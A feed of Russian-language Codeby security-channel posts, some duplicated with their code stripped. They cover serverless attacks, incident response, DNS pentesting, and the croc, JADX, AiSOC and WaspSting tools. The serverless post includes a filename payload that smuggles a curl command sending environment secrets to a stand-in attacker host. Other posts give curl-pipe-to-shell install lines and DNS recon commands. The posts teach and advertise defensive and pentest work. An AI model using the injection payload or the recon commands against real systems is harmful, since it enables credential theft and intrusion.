47 Lambda-функций и ни одного алерта: почему SOC не видит serverless-атаки
Представьте: утёкший access key на GitHub, понедельник утро, и через полтора часа пентестер уже читает production-таблицу с платёжными данными 200 тысяч клиентов. CloudTrail работает, но ни одного алерта на serverless-специфичные TTPs. Функция отработала за миллисекунды и исчезла вместе с контейнером. Расследовать нечего.
Это реальная ситуация с cloud-пентеста в начале 2025 года. И она хорошо показывает главную проблему serverless-безопасности — классические средства мониторинга просто не заточены под эфемерные вычисления.
🔥 Три вектора, которые стоит знать
• Event injection — отравление триггеров. Lambda обрабатывает файл из S3 и подставляет имя объекта в
• Privilege escalation через IAM-роли. Если у атакующего есть
• Persistence через триггеры. Атакующий создаёт EventBridge-правило, которое вызывает вредоносную функцию при каждом создании IAM-пользователя или загрузке файла. Lambda как эфемерный C2-сервер: получает команды, передаёт на скомпрометированные хосты, завершается. Следов в файловой системе нет, потому что файловой системы нет.
📊 По данным Cloud Security Alliance, более 70% организаций до сих пор не имеют выделенных контролей для serverless-окружений. При этом рынок serverless-безопасности уже перевалил за 12 млрд долларов — деньги вкладываются, но зрелость detection отстаёт на годы.
🛡 Что проверить прямо сейчас:
1. Есть ли в ваших Lambda-функциях вызовы
2. Execution roles — минимальные привилегии или wildcard?
3. Настроены ли алерты на
В полной статье — разбор конкретных цепочек атак с примерами кода, detection-правилами для SIEM и чек-листом для харденинга.
https://codeby.net/threads/ataki-na-serverless-funktsii-injection-event-poisoning-i-privilege-escalation.93670/
Представьте: утёкший access key на GitHub, понедельник утро, и через полтора часа пентестер уже читает production-таблицу с платёжными данными 200 тысяч клиентов. CloudTrail работает, но ни одного алерта на serverless-специфичные TTPs. Функция отработала за миллисекунды и исчезла вместе с контейнером. Расследовать нечего.
Это реальная ситуация с cloud-пентеста в начале 2025 года. И она хорошо показывает главную проблему serverless-безопасности — классические средства мониторинга просто не заточены под эфемерные вычисления.
🔥 Три вектора, которые стоит знать
• Event injection — отравление триггеров. Lambda обрабатывает файл из S3 и подставляет имя объекта в
os.system(). Атакующий загружает файл с именем вроде ; curl attacker.com/exfil?d=$(env)#.csv — и переменные окружения с IAM-токенами утекают за одно исполнение. Одно. Миллисекунды. Причём WAF тут не спасёт: он защищает HTTP-уровень через API Gateway, но event injection через SQS или SNS идёт в обход — payload лезет через окно, пока WAF сторожит дверь.• Privilege escalation через IAM-роли. Если у атакующего есть
iam:PassRole и lambda:UpdateFunctionCode, он может подменить код существующей функции и привязать к ней роль с широкими правами. На пентесте 12 из 47 функций имели execution role с Action: "*" на S3 и DynamoDB. Это не edge-case, а типичная картина — разработчики назначают максимальные права «чтобы работало» и забывают ужать.• Persistence через триггеры. Атакующий создаёт EventBridge-правило, которое вызывает вредоносную функцию при каждом создании IAM-пользователя или загрузке файла. Lambda как эфемерный C2-сервер: получает команды, передаёт на скомпрометированные хосты, завершается. Следов в файловой системе нет, потому что файловой системы нет.
📊 По данным Cloud Security Alliance, более 70% организаций до сих пор не имеют выделенных контролей для serverless-окружений. При этом рынок serverless-безопасности уже перевалил за 12 млрд долларов — деньги вкладываются, но зрелость detection отстаёт на годы.
🛡 Что проверить прямо сейчас:
1. Есть ли в ваших Lambda-функциях вызовы
os.system() или subprocess с пользовательским вводом?2. Execution roles — минимальные привилегии или wildcard?
3. Настроены ли алерты на
UpdateFunctionCode и iam:PassRole в CloudTrail?В полной статье — разбор конкретных цепочек атак с примерами кода, detection-правилами для SIEM и чек-листом для харденинга.
https://codeby.net/threads/ataki-na-serverless-funktsii-injection-event-poisoning-i-privilege-escalation.93670/
👍8🔥5❤4
57% компаний узнают о взломе не от своего SOC. Почему?
Mandiant M-Trends 2025 фиксирует неприятную реальность: больше половины организаций получают новость о компрометации от внешней стороны — партнёра, регулятора, иногда журналиста. Не от собственного SIEM, не от EDR, не от аналитика на смене.
🔍 Медиана присутствия атакующего в сети до обнаружения — 11 дней. Звучит как исторический минимум, и формально так и есть. Но за 11 дней злоумышленник проходит полный kill chain: фишинг → закрепление → боковое перемещение → выгрузка данных или шифрование инфраструктуры. Когда вы узнаёте об атаке, ущерб уже нанесён.
Почему так происходит? Потому что SIEM ловит сигнатуры, а не контекст. Атакующий, который использует валидные учётные записи и штатные инструменты вроде
📊 Ещё одна цифра от IBM X-Force 2025: самый распространённый тип малвари сегодня — инфостилеры (32%), они обогнали шифровальщиков. А среднее время между публикацией CVE и устранением уязвимости в организации — 29 месяцев. Два с половиной года. Атакующим не нужны zero-day, когда окно открыто настолько широко.
⚙️ Расследование кибератаки — управляемый процесс с чёткими фазами. Два основных фреймворка — NIST SP 800-61 и SANS — описывают одну и ту же логику разными словами:
1. Подготовка — IR-план, playbook, инструменты наготове
2. Обнаружение и анализ — triage алерта, определение скоупа
3. Сдерживание — изоляция хоста, сегмента, учётки
4. Устранение и восстановление — очистка, пересоздание, возврат в продакшн
5. Разбор полётов — отчёт, timeline, IOC-приложения
Ключевое различие: NIST объединяет шаги 3-4, потому что на практике они идут параллельно. Вы изолируете один сегмент и тут же чистите соседний. SANS разбивает их последовательно, что удобнее для команд, которые строят процесс с нуля.
Но выбор фреймворка вторичен. Критично другое — сам факт наличия документированного плана. Без него каждый инцидент превращается в импровизацию, где теряются артефакты, затираются логи и уничтожаются доказательства.
🎯 Практический чеклист на первые 30 минут:
• Подтвердить алерт — это true positive?
• Определить скоуп — один хост или сегмент?
• Изолировать, не выключая — сохранить содержимое RAM
• Зафиксировать время — таймлайн начинается сейчас
Мы собрали полную карту Incident Response — от первого алерта до финального отчёта, с разбором форензики, анализа памяти, threat hunting и реальных кейсов. Все детали — в полной статье.
https://codeby.net/threads/rassledovaniye-kiberataki-polnaya-karta-incident-response-ot-obnaruzheniya-do-otcheta.93680/
Mandiant M-Trends 2025 фиксирует неприятную реальность: больше половины организаций получают новость о компрометации от внешней стороны — партнёра, регулятора, иногда журналиста. Не от собственного SIEM, не от EDR, не от аналитика на смене.
🔍 Медиана присутствия атакующего в сети до обнаружения — 11 дней. Звучит как исторический минимум, и формально так и есть. Но за 11 дней злоумышленник проходит полный kill chain: фишинг → закрепление → боковое перемещение → выгрузка данных или шифрование инфраструктуры. Когда вы узнаёте об атаке, ущерб уже нанесён.
Почему так происходит? Потому что SIEM ловит сигнатуры, а не контекст. Атакующий, который использует валидные учётные записи и штатные инструменты вроде
powershell.exe или wmic, не триггерит стандартные правила корреляции. Он выглядит как легитимный администратор.📊 Ещё одна цифра от IBM X-Force 2025: самый распространённый тип малвари сегодня — инфостилеры (32%), они обогнали шифровальщиков. А среднее время между публикацией CVE и устранением уязвимости в организации — 29 месяцев. Два с половиной года. Атакующим не нужны zero-day, когда окно открыто настолько широко.
⚙️ Расследование кибератаки — управляемый процесс с чёткими фазами. Два основных фреймворка — NIST SP 800-61 и SANS — описывают одну и ту же логику разными словами:
1. Подготовка — IR-план, playbook, инструменты наготове
2. Обнаружение и анализ — triage алерта, определение скоупа
3. Сдерживание — изоляция хоста, сегмента, учётки
4. Устранение и восстановление — очистка, пересоздание, возврат в продакшн
5. Разбор полётов — отчёт, timeline, IOC-приложения
Ключевое различие: NIST объединяет шаги 3-4, потому что на практике они идут параллельно. Вы изолируете один сегмент и тут же чистите соседний. SANS разбивает их последовательно, что удобнее для команд, которые строят процесс с нуля.
Но выбор фреймворка вторичен. Критично другое — сам факт наличия документированного плана. Без него каждый инцидент превращается в импровизацию, где теряются артефакты, затираются логи и уничтожаются доказательства.
🎯 Практический чеклист на первые 30 минут:
• Подтвердить алерт — это true positive?
• Определить скоуп — один хост или сегмент?
• Изолировать, не выключая — сохранить содержимое RAM
• Зафиксировать время — таймлайн начинается сейчас
Мы собрали полную карту Incident Response — от первого алерта до финального отчёта, с разбором форензики, анализа памяти, threat hunting и реальных кейсов. Все детали — в полной статье.
https://codeby.net/threads/rassledovaniye-kiberataki-polnaya-karta-incident-response-ot-obnaruzheniya-do-otcheta.93680/
❤9👍6🔥3🗿1
JADX: Декомпиляция Android-приложений
👉 Основные возможности
▶️ Преобразование файлов APK, DEX, AAR, AAB, ZIP и Class в Java-код
▶️ Извлечение и декодирование AndroidManifest.xml и других ресурсов из resources.arsc
▶️ Встроенный механизм для восстановления читаемых имен классов, методов и полей
▶️ Поддержка отладки на уровне smali-кода (требует дополнительной настройки)
⬇️ Установка
Проверка
⏺️ Декомпиляция APK-файла в директорию out
⏺️ Анализ безопасности приложения
⏺️ Быстрый просмотр через GUI
⏺️ Обработка нескольких DEX-файлов
🔎 Инструмент незаменим для:
- Анализа вредоносного ПО
- Исследования работы проприетарных библиотек
- Восстановления утерянного исходного кода
- Обучения принципам работы Android-приложений
#jadx #android #decompiler #androidsecurity #pentest #tool
🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
JADX — инструмент для преобразования Android-файлов (APK, DEX, AAR, AAB) в читаемый Java-код. Разработанный на Java, он позволяет анализировать внутреннее устройство Android-приложений без доступа к исходному коду.
sudo apt install jadx
Проверка
jadx -h
jadx -d out app.apk
jadx -d decompiled --deobf --show-bad-code suspicious.apk
jadx-gui app.apk
jadx -d out classes1.dex classes2.dex classes3.dex
- Анализа вредоносного ПО
- Исследования работы проприетарных библиотек
- Восстановления утерянного исходного кода
- Обучения принципам работы Android-приложений
#jadx #android #decompiler #androidsecurity #pentest #tool
Please open Telegram to view this post
VIEW IN TELEGRAM
❤8🔥6👍5
Блестящее реагирование, провальный отчёт: почему IR-документация важнее самого расследования
Представьте: команда закрывает ransomware-кейс за 52 часа. Containment — 4 часа, eradication — сутки, ни один критичный хост не потерян. А потом страховая отклоняет компенсацию, потому что в timeline три часовых пояса без UTC-привязки, а executive summary растянулся на 14 страниц. Техническое мастерство обнулилось документацией.
Реальный кейс — и типичная проблема. IR-отчёт определяет, получит ли компания страховую выплату, пройдёт ли аудит и извлечёт ли уроки для усиления инфраструктуры.
🎇 Первое правило: два документа вместо одного
CISO и совет директоров хотят одностраничник с цифрами ущерба и статусом восстановления. SOC-аналитик ждёт хэши, YARA-правила и маппинг на MITRE ATT&CK. Один документ не закроет обе потребности. Поэтому проверенная структура — это executive summary на 1–2 страницы плюс технический отчёт на 10–30 страниц с приложениями. Оба ссылаются на единый incident ID и общий timeline.
📄 Executive summary — не сокращённый техотчёт
Это отдельный документ со своей логикой. Задача — дать руководителю достаточно информации для решений за пять минут чтения. Обязательный минимум:
• Incident ID, severity и тип инцидента
• Хронология в три строки: обнаружили, сдержали, восстановили
• Масштаб воздействия — системы, пользователи, утечка ПДн
• Финансовая оценка — прямые и косвенные потери
• Три-пять рекомендаций верхнего уровня
Типичная ошибка — запихивать в summary IP-адреса и хэши. Руководство не оперирует этими данными, а их присутствие создаёт впечатление, что документ «технический» и его можно отложить.
⌛ Timeline — скелет всего отчёта
Без чёткой хронологии невозможно восстановить причинно-следственные связи и определить dwell time атакующего. Три правила, которые спасают от проблем:
1. Все timestamps строго в UTC. Формат:
2. Гранулярность зависит от фазы. Initial access и lateral movement — секунды. Восстановление — часы.
3. Каждая строка привязана к артефакту: лог SIEM, дамп памяти, pcap, скриншот EDR. Запись без источника — голословное утверждение, которое страховая просто вычеркнет.
Отдельная боль — IOC-приложения. Хэши, домены, IP-адреса без контекста и категоризации бесполезны. Как правильно оформить IOC-лист, выстроить timeline и собрать отчёт, который выдержит проверку аудитом и страховой — разобрали в полной версии статьи.
https://codeby.net/threads/ir-otchet-po-intsidentu-struktura-timeline-i-ioc-prilozheniya-dlya-biznesa-i-tekhkomandy.93675/
Представьте: команда закрывает ransomware-кейс за 52 часа. Containment — 4 часа, eradication — сутки, ни один критичный хост не потерян. А потом страховая отклоняет компенсацию, потому что в timeline три часовых пояса без UTC-привязки, а executive summary растянулся на 14 страниц. Техническое мастерство обнулилось документацией.
Реальный кейс — и типичная проблема. IR-отчёт определяет, получит ли компания страховую выплату, пройдёт ли аудит и извлечёт ли уроки для усиления инфраструктуры.
CISO и совет директоров хотят одностраничник с цифрами ущерба и статусом восстановления. SOC-аналитик ждёт хэши, YARA-правила и маппинг на MITRE ATT&CK. Один документ не закроет обе потребности. Поэтому проверенная структура — это executive summary на 1–2 страницы плюс технический отчёт на 10–30 страниц с приложениями. Оба ссылаются на единый incident ID и общий timeline.
Это отдельный документ со своей логикой. Задача — дать руководителю достаточно информации для решений за пять минут чтения. Обязательный минимум:
• Incident ID, severity и тип инцидента
• Хронология в три строки: обнаружили, сдержали, восстановили
• Масштаб воздействия — системы, пользователи, утечка ПДн
• Финансовая оценка — прямые и косвенные потери
• Три-пять рекомендаций верхнего уровня
Типичная ошибка — запихивать в summary IP-адреса и хэши. Руководство не оперирует этими данными, а их присутствие создаёт впечатление, что документ «технический» и его можно отложить.
Без чёткой хронологии невозможно восстановить причинно-следственные связи и определить dwell time атакующего. Три правила, которые спасают от проблем:
1. Все timestamps строго в UTC. Формат:
YYYY-MM-DD HH:MM:SS UTC. Если источник пишет в локальной зоне — конвертируй явно с указанием исходной.2. Гранулярность зависит от фазы. Initial access и lateral movement — секунды. Восстановление — часы.
3. Каждая строка привязана к артефакту: лог SIEM, дамп памяти, pcap, скриншот EDR. Запись без источника — голословное утверждение, которое страховая просто вычеркнет.
Отдельная боль — IOC-приложения. Хэши, домены, IP-адреса без контекста и категоризации бесполезны. Как правильно оформить IOC-лист, выстроить timeline и собрать отчёт, который выдержит проверку аудитом и страховой — разобрали в полной версии статьи.
https://codeby.net/threads/ir-otchet-po-intsidentu-struktura-timeline-i-ioc-prilozheniya-dlya-biznesa-i-tekhkomandy.93675/
Please open Telegram to view this post
VIEW IN TELEGRAM
👍10❤4🔥3
Под текстом любого задания на hackerlab.pro появился блок обсуждения, привязанный к ветке форума. Задать вопрос, попросить подсказку, ответить другому игроку — всё в одном месте, без перехода на codeby.net.
Зачем: чтобы опыт жил рядом с задачей. Тонкости стека, нетривиальные подходы, вещи которые не гуглятся — делитесь.
Одно правило: подсказки — да, флаги — нет.
⚠️ Не получается отправить сообщение
Виджет свежий, шероховатости есть. Самая частая проблема (невозможно написать в чат) решается так:
1. Выйти из аккаунта
2. Зайти заново через Codeby ID
🆘 Другие баги, странности, идеи
Напишите мне в Telegram: @The_Codeby или на форуме в ЛС — приложите скриншот и опишите что делали и что увидели. Чем подробнее — тем быстрее починим.
Пробуйте, ломайте, репортите.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8🔥4❤3
🐊croc
Инструмент позволяет выполнять следующие функции:
▶️ Позволяет любым двум компьютерам передавать данные (через ретрансляционный сервер);
▶️ Обеспечивает сквозное шифрование (с использованием PAKE);
▶️ Облегчает кроссплатформенную передачу (Windows, Linux, Mac);
▶️ Поддерживает передачу множества файлов;
▶️ Позволяет возобновлять прерванные передачи;
▶️ Не требует локального сервера или проброса портов;
▶️ Приоритет IPv6 с резервным использованием IPv4;
▶️ Может использовать прокси, например Tor.
⬇️ Установить можно в одну команду через Docker.
Использование
0️⃣ Чтобы отправить файл необходимо после команды send указать до него путь и ввести кодовую фразу.
Для получения файла просто необходимо ввести ту же кодовую фразу.
Кодовая фраза используется для установления соглашения о ключах с аутентификацией по паролю, в рамках которого генерируется секретный ключ для отправителя и получателя, используемый для сквозного шифрования.
1️⃣ В Linux и macOS процесс отправки и получения данных немного отличается. Чтобы избежать утечки секретных данных через имя процесса необходимо запустить croc с секретными данными в качестве переменной среды. Например, чтобы получить файл с секретом ***:
2️⃣ Отправка нескольких файлов
3️⃣ Отправка текста
4️⃣ Изменение алгоритма хэширования на imohash
#security #tools #share
🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Инструмент, предоставляющий возможность простого и безопасного способа отправки файлов с одного компьютера на другой.
Инструмент позволяет выполнять следующие функции:
croc() { [ $# -eq 0 ] && set -- ""; mkdir -p "$HOME/.config/croc"; docker run --rm -it --user "$(id -u):$(id -g)" -v "$(pwd):/c" -v "$HOME/.config/croc:/.config/croc" -w /c -e CROC_SECRET docker.io/schollz/croc "$@"; }Использование
Для получения файла просто необходимо ввести ту же кодовую фразу.
Кодовая фраза используется для установления соглашения о ключах с аутентификацией по паролю, в рамках которого генерируется секретный ключ для отправителя и получателя, используемый для сквозного шифрования.
CROC_SECRET=*** croc
croc send [file1] [file2] [file3] [folder1] [folder2]
croc send --text "hello world"
croc send --hash imohash SOMEFILE
#security #tools #share
Please open Telegram to view this post
VIEW IN TELEGRAM
❤6👍4🔥4
Одна команда dig — и вся инфраструктура как на ладони
Представьте: вы на внутреннем пентесте банка. Запускаете
DNS — протокол, который все считают скучным. А он работает поверх UDP без шифрования и без аутентификации ответов. Из этого растут почти все атаки.
🔎 Пассивная разведка — начинай с неё, чтобы не светиться в логах цели. Certificate Transparency Logs через
🎇 Zone transfer — первое, что проверяется на engagement. Важный нюанс: проверяй каждый NS отдельно. Первичный может быть закрыт, а вторичный — legacy-BIND с дефолтной конфигурацией, где AXFR разрешён для любого IP. На практике именно вторичные NS чаще оказываются misconfigured — их просто забывают.
➡️ Когда zone transfer закрыт, переходи к словарному перебору субдоменов.
➡️ Отдельная история — внутренний пентест и Active Directory. SRV-записи для Kerberos и LDAP выдают контроллеры домена напрямую:
Но разведка — только начало. Cache poisoning строится на том, что Transaction ID в DNS — всего 16 бит. Угадай его и отправь поддельный ответ быстрее настоящего сервера — резолвер примет фальшивые данные. DNS rebinding позволяет обходить same-origin policy браузера, а DNS туннелирование — выносить данные из сетей, где заблокировано всё, кроме DNS.
В полной статье — разбор каждой техники с командами, ограничениями, привязкой к MITRE ATT&CK и decision tree по выбору инструментов. Читай на форуме Codeby⬇️
https://codeby.net/threads/dns-pentest-ot-razvedki-i-zone-transfer-do-cache-poisoning-rebinding-i-tunnelirovaniya.93673/
Представьте: вы на внутреннем пентесте банка. Запускаете
dig axfr на вторичный NS — и получаете 340+ DNS-записей за четыре минуты. Имена хостов вроде dc01-prod, jenkins-build, vault-backup — готовая карта инфраструктуры. От этого дампа до domain admin — три дня. Реальный кейс, реальная пропорция.DNS — протокол, который все считают скучным. А он работает поверх UDP без шифрования и без аутентификации ответов. Из этого растут почти все атаки.
crt.sh отдают субдомены, для которых выпускались SSL-сертификаты. Passive DNS базы вроде SecurityTrails хранят историю резолвов — субдомен, который больше не резолвится, но когда-то указывал на IP, может стать вектором subdomain takeover. subfinder от ProjectDiscovery автоматизирует сбор из десятков источников одной командой.dnsenum и dnsrecon комбинируют попытку AXFR с брутфорсом по словарю и reverse lookup. Для bug bounty с широким скоупом лучше связка amass + subfinder + dnsx с дедупликацией.dig -t SRV _ldap._tcp.dc._msdcs.domain.com. Эти записи нужны самому AD для работы — удалить их нельзя. По сути, DNS в AD — встроенный инструмент разведки для атакующего.Но разведка — только начало. Cache poisoning строится на том, что Transaction ID в DNS — всего 16 бит. Угадай его и отправь поддельный ответ быстрее настоящего сервера — резолвер примет фальшивые данные. DNS rebinding позволяет обходить same-origin policy браузера, а DNS туннелирование — выносить данные из сетей, где заблокировано всё, кроме DNS.
В полной статье — разбор каждой техники с командами, ограничениями, привязкой к MITRE ATT&CK и decision tree по выбору инструментов. Читай на форуме Codeby
https://codeby.net/threads/dns-pentest-ot-razvedki-i-zone-transfer-do-cache-poisoning-rebinding-i-tunnelirovaniya.93673/
Please open Telegram to view this post
VIEW IN TELEGRAM
❤8👍5🔥3
AiSOC — AI-платформа для автоматизации SOC и threat hunting
Основные возможности
📉 AI-анализ security событий и логов
📉 Поиск IOC, TTP и аномалий
📉 Генерация гипотез для threat hunting
📉 Анализ SIEM алертов и telemetry
📉 Генерация Sigma/YARA detection rules
📉 Помощь при incident response
🖱 Интеграция с SOC workflow
🛡 Примеры использования
One-click установка
Локальный demo запуск (Docker):
Типичные сценарии
▶️ Анализ подозрительных логов
▶️ Разбор SIEM алертов
▶️ Threat hunting с помощью AI
▶️ Генерация detection rules
▶️ Анализ IOC и TTP
👉 Deploy на Fly io
#soc #threathunting #incidentresponse #ai #llm #siem #blueteam #dfir #cybersecurity #opensource
🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
AiSOC — open-source инструмент, который использует LLM для помощи аналитикам SOC, threat hunters и incident responders.Позволяет анализировать логи, события безопасности, IOC, правила детекта и ускорять расследование инцидентов с помощью AI.
Основные возможности
One-click установка
# Linux + macOS (one-liner):
curl -fsSL https://raw.githubusercontent.com/beenuar/AiSOC/main/install.sh | bash
# Windows (PowerShell as Administrator):
iwr -useb https://raw.githubusercontent.com/beenuar/AiSOC/main/install.ps1 | iex
Локальный demo запуск (Docker):
git clone https://github.com/beenuar/AiSOC.git && cd AiSOC && pnpm aisoc:demo
Типичные сценарии
git clone https://github.com/beenuar/AiSOC.git && cd AiSOC
./infra/fly/fly-demo-deploy.sh --provision
#soc #threathunting #incidentresponse #ai #llm #siem #blueteam #dfir #cybersecurity #opensource
Please open Telegram to view this post
VIEW IN TELEGRAM
❤8👍7🔥4
340 резюме, 8 офферов: что реально нужно для стажировки в кибербезе
Недавно я наткнулся на показательную статистику одного SOC-подразделения: из 340 резюме оффер получили только 8 человек. Конверсия — 2,3%. Звучит жёстко, но вот что интересно: ни у одного из этих восьми не было коммерческого опыта в ИБ. Зато у каждого — конкретные артефакты: разобранные CTF-таски на GitHub, write-up'ы с TryHackMe, самостоятельно развёрнутый ELK-стек.
Стажировка по кибербезопасности — не лотерея. И рынок в России заметно вырос: если три года назад выбирали между двумя-тремя компаниями, то сейчас только на одном агрегаторе — больше десяти активных программ. Positive Technologies, ГК Солар, ВТБ, Angara Security, UserGate, Альфа-Банк — все набирают стажёров.
🔎 Что реально спрашивают на отборе?
Забудьте про сертификаты и красный диплом. Ни одна из крупных программ не требует CompTIA Security+ или минимальный GPA. Вот что действительно важно:
• Базовые сети и Linux. TCP/IP, DNS, HTTP, разница между TCP и UDP — спрашивают на каждом техническом скрининге. Не уровень CCNA, но уверенные основы.
• Мотивация через действия. Не фраза «хочу развиваться в ИБ», а ответ на вопрос «Какой CTF-таск последний решали?». Три write-up'а на GitHub весят больше любого сопроводительного письма.
• Python + Bash. Для российских стажировок этой связки хватает на 90% задач.
🎇 Отдельно про портфолио. Тут важно определиться с треком. Хотите в SOC / Blue Team — собирайте write-up'ы с CyberDefenders, пишите собственные Sigma- и YARA-правила, документируйте домашний стенд. Тянет в пентест / Red Team — прокачивайтесь на HackTheBox, публикуйте разборы retired-машин, автоматизируйте сканирование.
Порог входа разный: в Blue Team больше программ и мягче конкуренция. В пентест — жёстче, но и программы вроде Summ3r of Hack от Digital Security, дают уникальный offensive-опыт.
💵 Про деньги: вилка для стажёра по ИБ в Москве — от 25 000 до 60 000 руб./мес. до вычета налогов. Для сравнения, в США средняя ставка — около $48/час. Цифры несопоставимы, но главная ценность стажировки — не сумма на карте, а строчка в резюме и навыки, которые открывают дверь к полноценному офферу.
Всё это реально закрыть за 3–6 месяцев целенаправленной подготовки. Главное — не ждать идеального момента, а начать собирать портфолио прямо сейчас.
Полный разбор программ, требований и пошаговый план подготовки — в статье на форуме.
https://codeby.net/threads/kak-popast-na-stazhirovku-po-kiberbezopasnosti-v-2026-godu-razbor-programm-trebovaniya-i-sovety.93705/
Недавно я наткнулся на показательную статистику одного SOC-подразделения: из 340 резюме оффер получили только 8 человек. Конверсия — 2,3%. Звучит жёстко, но вот что интересно: ни у одного из этих восьми не было коммерческого опыта в ИБ. Зато у каждого — конкретные артефакты: разобранные CTF-таски на GitHub, write-up'ы с TryHackMe, самостоятельно развёрнутый ELK-стек.
Стажировка по кибербезопасности — не лотерея. И рынок в России заметно вырос: если три года назад выбирали между двумя-тремя компаниями, то сейчас только на одном агрегаторе — больше десяти активных программ. Positive Technologies, ГК Солар, ВТБ, Angara Security, UserGate, Альфа-Банк — все набирают стажёров.
Забудьте про сертификаты и красный диплом. Ни одна из крупных программ не требует CompTIA Security+ или минимальный GPA. Вот что действительно важно:
• Базовые сети и Linux. TCP/IP, DNS, HTTP, разница между TCP и UDP — спрашивают на каждом техническом скрининге. Не уровень CCNA, но уверенные основы.
• Мотивация через действия. Не фраза «хочу развиваться в ИБ», а ответ на вопрос «Какой CTF-таск последний решали?». Три write-up'а на GitHub весят больше любого сопроводительного письма.
• Python + Bash. Для российских стажировок этой связки хватает на 90% задач.
Порог входа разный: в Blue Team больше программ и мягче конкуренция. В пентест — жёстче, но и программы вроде Summ3r of Hack от Digital Security, дают уникальный offensive-опыт.
Всё это реально закрыть за 3–6 месяцев целенаправленной подготовки. Главное — не ждать идеального момента, а начать собирать портфолио прямо сейчас.
Полный разбор программ, требований и пошаговый план подготовки — в статье на форуме.
https://codeby.net/threads/kak-popast-na-stazhirovku-po-kiberbezopasnosti-v-2026-godu-razbor-programm-trebovaniya-i-sovety.93705/
Please open Telegram to view this post
VIEW IN TELEGRAM
👍11👎6🔥6❤4🌚1
Взлом GitHub — взлом устройств сотрудников привёл к утечке данных из более чем 3800 внутренних репозиториев.
🔎 Во вторник GitHub сообщил о расследовании несанкционированного доступа к своим внутренним репозиториям после того, как печально известный злоумышленник, действующий под псевдонимом TeamPCP, выставил на продажу на одном из киберпреступных форумов исходный код платформы и данные о её внутренней структуре.
GitHub утверждает, что инцидент не затронул информацию клиентов, хранящуюся за пределами внутренних репозиториев GitHub, но они внимательно отслеживают инфраструктуру на предмет возможной последующей активности.
Компания также отметила, что в случае обнаружения каких-либо последствий она уведомит об этом клиентов через установленные каналы реагирования на инциденты и оповещения.
❗️ Группа хакеров TeamPCP, стоящая за серией атак на цепочки поставок ПО, нацеленных на пакеты с открытым исходным кодом - выставила на продажу исходный код GitHub по цене не менее 50.000 долларов. Предполагаемый дамп включает около 4000 репозиториев.
Также TeamPCP заявила, что не преследует цели вымогать деньги у GitHub: "Достаточно одного покупателя - и мы уничтожим данные с нашей стороны. Похоже, мы скоро уходим на покой, поэтому, если покупатель не найдётся, мы сольём данные бесплатно."
➡️ Источник: https://thehackernews.com/2026/05/github-investigating-teampcp-claimed.html
#news #github #TeamPCP
🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
GitHub утверждает, что инцидент не затронул информацию клиентов, хранящуюся за пределами внутренних репозиториев GitHub, но они внимательно отслеживают инфраструктуру на предмет возможной последующей активности.
Компания также отметила, что в случае обнаружения каких-либо последствий она уведомит об этом клиентов через установленные каналы реагирования на инциденты и оповещения.
Также TeamPCP заявила, что не преследует цели вымогать деньги у GitHub: "Достаточно одного покупателя - и мы уничтожим данные с нашей стороны. Похоже, мы скоро уходим на покой, поэтому, если покупатель не найдётся, мы сольём данные бесплатно."
#news #github #TeamPCP
Please open Telegram to view this post
VIEW IN TELEGRAM
❤7🔥6👍4
WaspSting
📐 Возможности:
📉 Автоматическая документация - шаблоны для заполнения доказательств по каждой обнаруженной уязвимости, отчет создается автоматически
📉 Перечисление поддоменов - crt.sh + HackerTarget + перебор DNS
📉 Галерея ресурсов - скриншоты + метаданные каждого обнаруженного поддомена
📉 Фаззер полезных нагрузок - SQLi, XSS, SSTI, SSRF, внедрение запросов, обход пути + пользовательские списки слов
📉 Уведомления в реальном времени - веб-хуки Slack/Discord + автоматические задачи GitHub, создаваемые на основе обнаруженных уязвимостей
📉 Локальный ИИ через Ollama - проверка кода + информация bug bounty, без ключа API, ничего не покидает ваш компьютер
📉 HTML-отчет для руководителей - оценка риска, диаграммы серьезности, фильтруемая таблица обнаруженных уязвимостей
📉 Конфигурация Burp Suite Community - предварительно настроенные области действия, полезные нагрузки и запросы Repeater
🖱 Поиск CVE в NVD - без необходимости в ключах
⬇️ Установка:
0️⃣ Клонируем репозиторий и переходим в рабочую директорию:
1️⃣ Создаём виртуальное окружение venv:
2️⃣ Установка зависимостей:
3️⃣ Установка локальной ИИ (olama):
4️⃣ Устанавливаем chromium для скриншотов (не обязательно):
⛓️💥 Запуск:
▶️ Сканирование цели:
▶️ Статический анализ кода:
▶️ Проверка на наличие уязвимостей (Recon + CVE) в вашем собственном приложении:
▶️ Перечисление поддоменов:
▶️ Планировщик Bug Bounty:
▶️ Аудит аутентификации:
#web #wapt #nmap
🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
WaspSting - это инструмент командной строки на Python для белого тестирования на проникновение, поиска уязвимостей и проведения исследований в области безопасности. Он решает одну из самых трудоемких задач пентестинга - документирование - автоматически генерируя структурированные отчеты, шаблоны доказательств и планы тестирования по мере вашей работы.
git clone https://github.com/N00dleN00b/waspsting.git
cd waspsting
python -m venv venv
source venv/bin/activate
pip install -r requirements.txt
curl -fsSL https://ollama.ai/install.sh | sh
ollama pull llama3
ollama serve
sudo apt install chromium
python waspsting.py -t {URL}python waspsting.py --repo https://github.com/{username}/{repo} --mode sastpython waspsting.py --target {URL} --mode recon --cve --confirmpython waspsting.py --target {URL} --mode enum --screenshot --confirmpython waspsting.py --mode bounty
python waspsting.py -t {URL} --mode auth --wordlist {WORDLIST} --confirm#web #wapt #nmap
Please open Telegram to view this post
VIEW IN TELEGRAM
👍9❤6🔥4
Вы умеете находить следы взлома, когда их пытаются скрыть?
После атак злоумышленники чистят логи, маскируют ВПО и заметают следы. Большинство видит пустоту.
Только настоящий профессионал восстанавливает картину целиком.
Курс по реагированию на компьютерные инциденты — та самая база для будущих экспертов в BlueTeam и IRT.
Курс РКИ — это не теория. Это практический курс, после которого вы будете:
⏺️ собирать дампы памяти и артефакты с Windows/Linux
⏺️ анализировать логи и вредоносное ПО
⏺️ применять Threat Intelligence и Threat Hunting для поиска скрытых угроз
⏺️ грамотно реагировать на атаки и искать следы проникновения
Что в программе
➡️ 26 тем, практические ДЗ (с 5-ой темы) и итоговый экзамен: теория (30 вопросов) + расследование реального кейса по виртуальной машине с подготовкой отчёта.
Стартуем 8 июня
😀 ☺️ 😚 🥲 😎 Подписка на hackerlab.pro — 40+ заданий по форензике и реагированию при записи на курс!
Узнать подробнее о курсе
